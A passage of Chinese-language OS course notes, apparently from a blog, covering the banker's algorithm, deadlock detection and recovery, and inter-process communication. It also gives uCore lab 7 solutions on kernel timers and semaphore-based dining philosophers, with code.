class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Work和Finish分别是长度为m和n的向量初始化</span></span><br><span class="line">Work[m], Finish[n];</span><br><span class="line"></span><br><span class="line">Work = Available; <span class="comment">// 当前资源剩余空闲量</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; n; i++)</span><br><span class="line">  Finish[i] = <span class="literal">false</span>; <span class="comment">// 线程i没结束</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// ...每个线程开始运行并分配资源</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 在一段时间后</span></span><br><span class="line"><span class="comment">// 寻找Need比Work小，同时还未结束的线程Ti</span></span><br><span class="line"><span class="keyword">while</span>(Finish[i] == <span class="literal">false</span> &amp;&amp; Need[i] &lt;= Work)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 线程i的资源需求量小于当前剩余空闲资源量，所以该线程可以正常结束，并回收该线程的所有资源</span></span><br><span class="line">    Work += Allocation[i];</span><br><span class="line">    Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 如果所有线程Ti都满足Finish[i] == true,则系统处于安全状态。</span></span><br><span class="line"><span class="keyword">if</span>(Finish == <span class="literal">true</span>)</span><br><span class="line">    Safe;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="comment">// 反之，系统处于不安全状态。</span></span><br><span class="line">    NoSafe;</span><br></pre></td></tr></table></figure></li><li><p>银行家算法具体设计</p><ul><li><p>初始化：$Request_i$：线程$T_i$的资源请求向量， $Request_i[j]$：线程$T_i$请求资源$R_j$的实例</p></li><li><p>循环：</p><ol><li><p>如果$Request_i &lt;= Need[i]$，则转到步骤2。否则拒绝资源申请，因为线程已经超过了其最大资源要求。</p></li><li><p>如果$Request_i &lt;= Available$，转到步骤3。否则，$T_i$必须等待，因为资源不可用。</p></li><li><p>通过安全状态判断来确定是否分配资源给$T_i$</p><ul><li><p>生成一个需要判断状态是否安全的资源分配环境</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Available = Available - Request_i;</span><br><span class="line">Allocation[i] = Allocation[i] + Request_i;</span><br><span class="line">Need[i] = Need[i] - Request_i;</span><br></pre></td></tr></table></figure></li><li><p>并调用上文的<strong>安全状态判断</strong></p><ul><li>如果返回结果是<strong>安全</strong>，则将资源分配给$T_i$</li><li>如果返回结果是<strong>不安全</strong>，系统会拒绝$T_i$的资源请求</li></ul></li></ul></li></ol></li></ul></li></ul><h5 id="3-死锁检测和恢复">3) 死锁检测和恢复</h5><blockquote><p>死锁检测和恢复（Deadlock Detection &amp; Recovery） : 在检测到运行系统进入死锁状态后进行恢复。</p></blockquote><ul><li><p>特点</p><ul><li>允许系统进入死锁状态</li><li>维护系统的资源分配图</li><li>定期调用死锁检测算法来搜索图中是否存在死锁</li><li>出现死锁时，用死锁恢复机制进行恢复。</li></ul></li></ul><h6 id="i-死锁检测">i. 死锁检测</h6><ul><li><p>数据结构</p><ul><li><strong>Available(剩余空闲量)</strong>：长度为m的向量，每种类型可用资源的数量</li><li><strong>Allocation(已分配量)</strong>：n x m 矩阵，当前分配给各个进程每种类型资源的数量，进程$P_i$拥有资源$R_i$的$Allocation[i, j]$个实例。</li></ul></li><li><p>死锁检测算法</p><blockquote><p>该算法与银行家算法类似。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Work和Finish分别是长度为m和n的向量初始化</span></span><br><span class="line">Work[m], Finish[n];</span><br><span class="line"></span><br><span class="line">Work = Available; <span class="comment">// 当前资源剩余空闲量</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; n; i++)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 如果当前遍历到的线程占用资源，则设置Finish为false</span></span><br><span class="line">    <span class="comment">// 反之，如果当前线程不占用资源，则要么是线程已结束，要么是我们不关心的线程</span></span><br><span class="line">    <span class="keyword">if</span>(Allocation[i] &gt; <span class="number">0</span>)</span><br><span class="line">      Finish[i] = <span class="literal">false</span>; <span class="comment">// 线程i没结束</span></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ...每个线程开始运行并分配资源</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 在一段时间后</span></span><br><span class="line"><span class="comment">// 寻找Request比Work小，同时还未结束的线程Ti</span></span><br><span class="line"><span class="keyword">while</span>(Finish[i] == <span class="literal">false</span> &amp;&amp; Request[i] &lt;= Work)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 线程i的资源需求量小于当前剩余空闲资源量，所以该线程可以正常结束，并回收该线程的所有资源</span></span><br><span class="line">    Work += Allocation[i];</span><br><span class="line">    Finish[i] = <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 如果所有线程Ti都满足Finish[i] == true,则系统处于正常状态</span></span><br><span class="line"><span class="keyword">if</span>(Finish == <span class="literal">true</span>)</span><br><span class="line">    NoDeadlock;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="comment">// 反之，系统处于死锁状态。</span></span><br><span class="line">    Deadlock;</span><br></pre></td></tr></table></figure></li><li><p>死锁检测算法的使用</p><ul><li>死锁检测的时间和周期选择依据<ul><li>死锁多久可能会发生</li><li>多少进程需要被回滚</li></ul></li><li>资源图可能有多个循环，难以分辨”造成“死锁的关键进程</li></ul></li></ul><h6 id="ii-死锁恢复">ii. 死锁恢复</h6><ul><li><strong>进程终止</strong><ul><li>终止所有的死锁线程</li><li>一次只终止一个进程直到死锁消除</li><li>终止进程的顺序应该是<ul><li>进程的优先级</li><li>进程已运行时间以及还需运行时间</li><li>进程已占用资源</li><li>进程完成需要的资源</li><li>进程完成需要的资源</li><li>终止进程数目</li><li>进程是交互式还是批处理</li></ul></li></ul></li><li><strong>资源抢占</strong><ul><li>选择被抢占进程：最小成本目标</li><li>进程回退：返回到一些安全状态，重启进程到安全状态</li><li>可能会出现饥饿：同一个进程可能一直被选作被抢占者</li></ul></li></ul><h3 id="8-进程通信">8. 进程通信</h3><h4 id="a-基本概念">a. 基本概念</h4><ul><li><p>进程通信（IPC, Inter-Process Communication）是进程进行通信和同步的机制</p></li><li><p>IPC提供2个基本操作：发送操作send和接收操作receive</p></li><li><p>进程通信流程</p><ul><li>在通信进程间建立通信链路</li><li>通过send/receive交换信息</li></ul></li><li><p>进程链路特征</p><ul><li>物理（如：共享内存，硬件总线）</li><li>逻辑（如：逻辑属性）</li></ul></li></ul><h5 id="1-直接通信">1) 直接通信</h5><ul><li>进程必须正确的命名对方<ul><li>send(P, message) - 发送信息到进程P</li><li>receive(P, message) - 从进程Q接收信息</li></ul></li><li>通信链路的属性<ul><li>自动建立链路</li><li>一条链路恰好对应一对通信进程</li><li>每对进程之间只有一个链接存在</li><li>链接可以是单向，但通常是双向。</li></ul></li></ul><h5 id="2-间接通信">2) 间接通信</h5><ul><li>通过操作系统维护的消息队列实现进程间的消息接收和发送<ul><li>每个消息队列都有一个唯一的标识</li><li>只有共享了相同消息队列的进程，才能够通信。</li></ul></li><li>通信链路的属性<ul><li>只有共享了相同消息队列的进程，才建立了连接。</li><li>连接可以是单向或双向的。</li><li>消息队列可以与多个进程相关联。</li></ul></li><li>通信流程<ul><li>创建一个新的消息队列</li><li>通过消息队列发送或接收消息</li><li>销毁消息队列</li></ul></li><li>基本通信操作<ul><li>send(A, message) - 发送消息到队列A</li><li>receive(A, message) - 从队列A接收消息</li></ul></li></ul><h5 id="3-阻塞与非阻塞通信">3) 阻塞与非阻塞通信</h5><ul><li>进程通信可划分为阻塞（同步）和非阻塞（异步）</li><li>阻塞通信<ul><li>阻塞发送：发送者在发送消息后进入等待，直到接收者成功收到</li><li>阻塞接收：接收者在请求接收数据后进入等待，直到成功收到一个消息</li></ul></li><li>非阻塞通信<ul><li>非阻塞发送：发送者在消息发送后，可立即进行其他操作</li><li>非阻塞接收：没有消息发送时，接收者在请求接收消息后，接收不到任何消息</li></ul></li></ul><h5 id="4-通信链路缓冲">4) 通信链路缓冲</h5><blockquote><p>进程发送的消息在链路上可能有3种缓冲方式</p></blockquote><ul><li>0容量：发送方必须等待接收方</li><li>有限容量：通信链路缓冲队列满时，发送方必须等待</li><li>无限容量：发送方不需要等待</li></ul><h4 id="b-信号">b. 信号</h4><ul><li>信号（signal) ：进程间的软件中断通知和处理机制，例如<code>SIGKILL</code>, <code>SIGSTOP</code>, <code>SIGCONT</code>等</li><li>信号的接收处理<ul><li>捕获（catch）： 执行进程指定的信号处理函数被调用</li><li>忽略（Ignore）：执行操作系统指定的缺省处理，例如进程终止、进程挂起等</li><li>屏蔽（Mask）：禁止进程接收和处理信号（可能是暂时的）</li></ul></li><li>不足：传送的信息量小，只有一个信号类型</li></ul><h4 id="c-管道">c. 管道</h4><ul><li>管道（pipe）是进程间基于内存文件的通信机制<ul><li>子进程从父进程继承文件描述符</li><li>缺省文件描述符： 0 stdin, 1 stdout, 2 stderr</li><li>进程不知道另一端<ul><li>可能从键盘、文件、程序读取</li><li>可能写入到终端、文件、程序</li></ul></li></ul></li><li>与管道相关的系统调用<ul><li>读管道：<code>read(fd, buffer, nbytes)</code>。scanf基于此实现。</li><li>写管道：<code>write(fd, buffer, nbytes)</code>。printf基于此实现。</li><li>创建管道：<code>pipe(fd)</code><ul><li><code>rgfd</code>是两个文件描述符组成的数组</li><li><code>rgfd[0]</code>是读文件描述符</li><li><code>rgfd[1]</code>是写文件描述符</li></ul></li></ul></li></ul><h4 id="d-消息队列">d. 消息队列</h4><ul><li>消息队列是由操作系统维护的以字节序列为基本单位的间接通信机制<ul><li>每个消息(message)是一个字节序列</li><li>相同标识的消息组成按先进先出顺序组成一个消息队列（message queues)</li></ul></li><li>消息队列的系统调用<ul><li><code>msgget(key, flag)</code> : 获取消息队列标识</li><li><code>msgsnd(QID, buf, size, flag)</code> : 发送消息</li><li><code>msgrcv(QID, buf, size, type, flag)</code> : 接收消息</li><li><code>msgctl(...)</code>: 消息队列控制</li></ul></li></ul><h4 id="e-共享内存">e. 共享内存</h4><ul><li><p>共享内存是把同一个物理内存区域同时映射到多个进程的内存地址空间的通信机制。</p></li><li><p>进程间共享</p><ul><li>每个进程都有私有内存地址空间</li><li>每个进程的内存地址空间需明确设置共享内存段</li></ul></li><li><p>线程间共享：同一个进程中的线程总是共享相同的内存地址空间</p></li><li><p>优点：快速、方便地共享数据</p></li><li><p>缺点：必须使用额外的同步机制来协调数据访问。</p></li><li><p>共享内存的系统调用</p><ul><li><code>shmget(key, size, flags)</code> : 创建共享段</li><li><code>shmat(shmid, *shmaddr, flags)</code> ：把共享段映射到进程地址空间</li><li><code>shmdt(*shmaddr)</code> : 取消共享段到进程地址空间的映射</li><li><code>shmctl(...)</code> ： 共享段控制</li><li>需要信号量等机制协调共享内存的访问冲突。</li></ul></li></ul><h2 id="练习解答">练习解答</h2><h3 id="练习0">练习0</h3><blockquote><p>填写已有实验。</p></blockquote><p>搜索一下<code>Lab7</code>关键词，只需要将原先lab6<code>kern/trap/trap.c</code>中</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">        <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>替换为以下代码即可。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks ++;</span><br><span class="line">        <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">run_timer_list</span>(); <span class="comment">// 注意这里</span></span><br><span class="line">        <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><h4 id="定时器timer">定时器timer</h4><ul><li><p><code>timer_t</code>结构用于存储一个定时器所需要的相关数据，包括<strong>倒计时时间</strong>以及<strong>所绑定的进程</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> expires;       <span class="comment">//the expire time</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;   <span class="comment">//the proc wait in this timer. If the expire time is end, then this proc will be scheduled</span></span><br><span class="line">    <span class="type">list_entry_t</span> timer_link;    <span class="comment">//the timer list</span></span><br><span class="line">&#125; <span class="type">timer_t</span>;</span><br></pre></td></tr></table></figure></li><li><p><code>add_timer</code>用于将某个<code>timer</code>添加进timer列表中。</p><p>处于性能考虑，每个新添加的timer都会按照其<code>expires</code>属性的大小排列，同时减去上一个timer的<code>expires</code>属性。一个例子：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">两个尚未添加进列表中的timer:</span><br><span class="line">  timer1-&gt;expires = <span class="number">20</span>;</span><br><span class="line">  timer2-&gt;expires = <span class="number">38</span>;</span><br><span class="line">将这两个timer添加进列表后:（注意timer2的expires）</span><br><span class="line">  +------------+       +----------------------+       +--------------------------+</span><br><span class="line">  | timer_list | &lt;---&gt; | timer1-&gt;expires = <span class="number">20</span> | &lt;---&gt; | timer2-&gt;expires = <span class="number">18</span> !!! |</span><br><span class="line">  +------------+       +----------------------+       +--------------------------+</span><br></pre></td></tr></table></figure><p>这样，在更新timer_list中的所有timer的expires时，只需递减链首的<strong>第一个timer的expire</strong>，即可<strong>间接达到所有timer的expires减一的目的。</strong></p><p>该函数源代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// add timer to timer_list</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">add_timer</span><span class="params">(<span class="type">timer_t</span> *timer)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">assert</span>(timer-&gt;expires &gt; <span class="number">0</span> &amp;&amp; timer-&gt;proc != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">assert</span>(<span class="built_in">list_empty</span>(&amp;(timer-&gt;timer_link)));</span><br><span class="line">        <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;timer_list);</span><br><span class="line">        <span class="comment">// 减去每个遍历到的timer的expires</span></span><br><span class="line">        <span class="keyword">while</span> (le != &amp;timer_list) &#123;</span><br><span class="line">            <span class="type">timer_t</span> *next = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            <span class="keyword">if</span> (timer-&gt;expires &lt; next-&gt;expires) &#123;</span><br><span class="line">                next-&gt;expires -= timer-&gt;expires;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            timer-&gt;expires -= next-&gt;expires;</span><br><span class="line">            le = <span class="built_in">list_next</span>(le);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 将当前timer添加至列表中</span></span><br><span class="line">        <span class="built_in">list_add_before</span>(le, &amp;(timer-&gt;timer_link));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>run_timer_list</code>函数用于更新定时器的时间，并更新当前进程的运行时间片。如果当前定时器的剩余时间结束，则唤醒某个处于<code>WT_INTERRUPTED</code>等待状态的进程。有一点在上个函数中提到过：<strong>递减timer_list中每个timer的expires时，只递减链头第一个timer的expires</strong>。该函数的源代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// call scheduler to update tick related info, and check the timer is  expired? If expired, then wakup proc</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">run_timer_list</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;timer_list);</span><br><span class="line">        <span class="keyword">if</span> (le != &amp;timer_list) &#123;</span><br><span class="line">            <span class="type">timer_t</span> *timer = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            <span class="built_in">assert</span>(timer-&gt;expires != <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// 只递减链头timer的expires</span></span><br><span class="line">            timer-&gt;expires --;</span><br><span class="line">            <span class="keyword">while</span> (timer-&gt;expires == <span class="number">0</span>) &#123;</span><br><span class="line">                le = <span class="built_in">list_next</span>(le);</span><br><span class="line">                <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = timer-&gt;proc;</span><br><span class="line">                <span class="keyword">if</span> (proc-&gt;wait_state != <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="built_in">assert</span>(proc-&gt;wait_state &amp; WT_INTERRUPTED);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="built_in">warn</span>(<span class="string">&quot;process %d&#x27;s wait_state == 0.\n&quot;</span>, proc-&gt;pid);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">                <span class="built_in">del_timer</span>(timer);</span><br><span class="line">                <span class="keyword">if</span> (le == &amp;timer_list) &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                timer = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>将timer从timer_list中删除的操作比较简单：设置好<strong>当前待移除timer的下一个timer-&gt;expires</strong>，并<strong>将当前timer从链表中移除</strong>即可。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// del timer from timer_list</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">del_timer</span><span class="params">(<span class="type">timer_t</span> *timer)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">list_empty</span>(&amp;(timer-&gt;timer_link))) &#123;</span><br><span class="line">            <span class="keyword">if</span> (timer-&gt;expires != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;(timer-&gt;timer_link));</span><br><span class="line">                <span class="keyword">if</span> (le != &amp;timer_list) &#123;</span><br><span class="line">                    <span class="type">timer_t</span> *next = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">                    next-&gt;expires += timer-&gt;expires;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">list_del_init</span>(&amp;(timer-&gt;timer_link));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>一个简单的例子，<code>do_sleep</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_sleep</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> time)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (time == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 设置定时器</span></span><br><span class="line">    <span class="type">timer_t</span> __timer, *timer = <span class="built_in">timer_init</span>(&amp;__timer, current, time);</span><br><span class="line">    current-&gt;state = PROC_SLEEPING;</span><br><span class="line">    current-&gt;wait_state = WT_TIMER;</span><br><span class="line">    <span class="comment">// 启用定时器</span></span><br><span class="line">    <span class="built_in">add_timer</span>(timer);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 当前进程放弃CPU资源</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="comment">// 时间到点了，删除当前timer</span></span><br><span class="line">    <span class="built_in">del_timer</span>(timer);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>定时器的用处：定时器可以帮助操作系统在<strong>经过一段特定时间</strong>后执行一些特殊操作，例如唤醒执行线程。可以说，<strong>正是有了定时器，操作系统才有了时间这个概念</strong>。</p></li></ul><h3 id="练习1">练习1</h3><blockquote><p>理解内核级信号量的实现和基于内核级信号量的哲学家就餐问题</p></blockquote><ul><li><p>哲学家就餐问题</p><ul><li><p>uCore中的哲学家就餐主要代码较为简单：每个哲学家拿起叉子，进食，然后放下叉子。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> state_sema[N]; <span class="comment">/* 记录每个人状态的数组 */</span></span><br><span class="line"><span class="comment">/* 信号量是一个特殊的整型变量 */</span></span><br><span class="line"><span class="type">semaphore_t</span> mutex; <span class="comment">/* 临界区互斥 */</span></span><br><span class="line"><span class="type">semaphore_t</span> s[N]; <span class="comment">/* 每个哲学家一个信号量 */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">proc_struct</span> *philosopher_proc_sema[N];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">philosopher_using_semaphore</span><span class="params">(<span class="type">void</span> * arg)</span> <span class="comment">/* i：哲学家号码，从0到N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> i, iter=<span class="number">0</span>;</span><br><span class="line">    i=(<span class="type">int</span>)arg;</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;I am No.%d philosopher_sema\n&quot;</span>,i);</span><br><span class="line">    <span class="keyword">while</span>(iter++&lt;TIMES)</span><br><span class="line">    &#123; <span class="comment">/* 无限循环 */</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;Iter %d, No.%d philosopher_sema is thinking\n&quot;</span>,iter,i); <span class="comment">/* 哲学家正在思考 */</span></span><br><span class="line">        <span class="built_in">do_sleep</span>(SLEEP_TIME);</span><br><span class="line">        <span class="built_in">phi_take_forks_sema</span>(i);</span><br><span class="line">        <span class="comment">/* 需要两只叉子，或者阻塞 */</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;Iter %d, No.%d philosopher_sema is eating\n&quot;</span>,iter,i); <span class="comment">/* 进餐 */</span></span><br><span class="line">        <span class="built_in">do_sleep</span>(SLEEP_TIME);</span><br><span class="line">        <span class="built_in">phi_put_forks_sema</span>(i);</span><br><span class="line">        <span class="comment">/* 把两把叉子同时放回桌子 */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;No.%d philosopher_sema quit\n&quot;</span>,i);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>拿起 / 放下叉子时，由于需要修改当前哲学家的状态，同时该状态是<strong>全局共享变量</strong>，所以需要获取锁来防止条件竞争。</p><p>将叉子放回桌上时，如果当前哲学家左右两边的两位哲学家处于<strong>饥饿状态</strong>，即准备进餐但没有刀叉时，如果条件符合，则唤醒这两位哲学家并让其继续进餐。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_take_forks_sema</span><span class="params">(<span class="type">int</span> i)</span> <span class="comment">/* i：哲学家号码从0到N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="built_in">down</span>(&amp;mutex); <span class="comment">/* 进入临界区 */</span></span><br><span class="line">        state_sema[i]=HUNGRY; <span class="comment">/* 记录下哲学家i饥饿的事实 */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(i); <span class="comment">/* 试图得到两只叉子 */</span></span><br><span class="line">        <span 